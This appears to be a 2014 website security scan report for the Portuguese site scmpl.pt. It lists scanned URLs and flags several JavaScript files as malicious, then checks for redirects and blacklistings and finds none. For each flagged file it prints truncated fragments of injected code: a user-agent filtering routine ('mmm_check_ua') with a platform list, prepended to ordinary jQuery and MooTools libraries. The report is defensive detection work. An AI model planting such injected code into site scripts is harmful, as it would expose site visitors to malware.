Scanned pages/files
Request | Server response | Status |
http://scmpl.pt/ | HTTP/1.1 200 OK Connection: close Date: Wed, 27 Aug 2014 00:39:26 GMT Accept-Ranges: bytes Server: Apache Content-Language: pt Content-Length: 594 Content-Type: text/html Last-Modified: Fri, 09 May 2014 09:32:24 GMT | clean |
http://www.scmpl.pt/portal2/ | 200 OK Content-Length: 22037 Content-Type: text/html | clean |
http://www.scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-2.0.3.min.js | 200 OK Content-Length: 83612 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-migrate-1.2.1.js | 200 OK Content-Length: 17142 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-utils.js | 200 OK Content-Length: 69 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jqueryui/js/jquery-ui-1.10.3.custom.min.js | 200 OK Content-Length: 228137 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/highslide/js/highslide-full.min.js | 200 OK Content-Length: 71460 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdcaptcha/js/jquery.cdcaptcha.js | 200 OK Content-Length: 14542 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' case 0: submitElement.button('disable'); break; case 1: submitElement.button('enable'); break; } }; function empty(mixed_var) { var key;if(mixed_var===""||mixed_var===0||mixed_var==="0"||mixed_var===null||mixed_var===false||typeof mixed_var==='undefined'){return true}if(typeof mixed_var=='object'){for(key in mixed_var){return false}return true}return false; }; })(jQuery); } Antivirus reports:
| ||
http://scmpl.pt/portal2/?cdcaptcha=getScript&random=VGe11rF5OHjRvIFt1CgjgsnZqP5Q | 200 OK Content-Length: 564 Content-Type: application/x-javascript | clean |
http://scmpl.pt/portal2/media/system/js/mootools-core.js | 200 OK Content-Length: 101169 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})(); Antivirus reports:
| ||
http://scmpl.pt/portal2/media/system/js/core.js | 200 OK Content-Length: 9591 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/media/system/js/caption.js | 200 OK Content-Length: 5536 Content-Type: application/javascript | clean |
http://www.scmpl.pt/portal2/modules/mod_bt_contentslider/tmpl/js/slides.js | 200 OK Content-Length: 32966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' $children.hide(); var indices = []; for (i=0;i<childCount;i++) { indices[indices.length] = i; } indices = indices.sort(randomizeOrder); $.each(indices,function(j,k) { var $child = $children.eq(k); var $clone = $child.clone(true); $clone.show().appendTo($this); if (callback !== undefined) { callback($child, $clone); } $child.remove(); }); } })); }; })(jQuery); Antivirus reports:
| ||
http://www.scmpl.pt/portal2/modules/mod_bt_contentslider/tmpl/js/default.js | 200 OK Content-Length: 5704 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' } BTCJ('#btcontentslider' + btcModuleIds[i]).slides(btcModuleOpts[i]); if (jQuery("html").css("direction") == "rtl") { jQuery('#btcontentslider' + btcModuleIds[i] + ' .slides_control').css("direction", "rtl"); } } } jQuery('img.hovereffect').hover(function () { jQuery(this).stop(true).animate({ opacity : 0.5 }, 300) }, function () { jQuery(this).animate({ opacity : 1 }, 300) }) }) Antivirus reports:
| ||
http://www.scmpl.pt/portal2/modules/mod_bt_contentslider/tmpl/js/jquery.easing.1.3.js | 200 OK Content-Length: 12878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' } else if (t < (2/2.75)) { return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return BTCJ.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return BTCJ.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://scmpl.pt/portal2/media/system/js/mootools-more.js | 200 OK Content-Length: 243138 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^ï¿¥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value")); }}); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: scmpl.pt
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 00:39:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: pt
Content-Length: 594
Content-Type: text/html
Last-Modified: Fri, 09 May 2014 09:32:24 GMT
...594 bytes of data.
GET / HTTP/1.1
Host: scmpl.pt
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 00:39:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: pt
Content-Length: 594
Content-Type: text/html
Last-Modified: Fri, 09 May 2014 09:32:24 GMT
...594 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: scmpl.pt
Referer: http://www.google.com/search?q=scmpl.pt
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: scmpl.pt
Referer: http://www.google.com/search?q=scmpl.pt
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=scmpl.pt
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://scmpl.pt/
Result: scmpl.pt is not infected or malware details are not published yet.
Result: scmpl.pt is not infected or malware details are not published yet.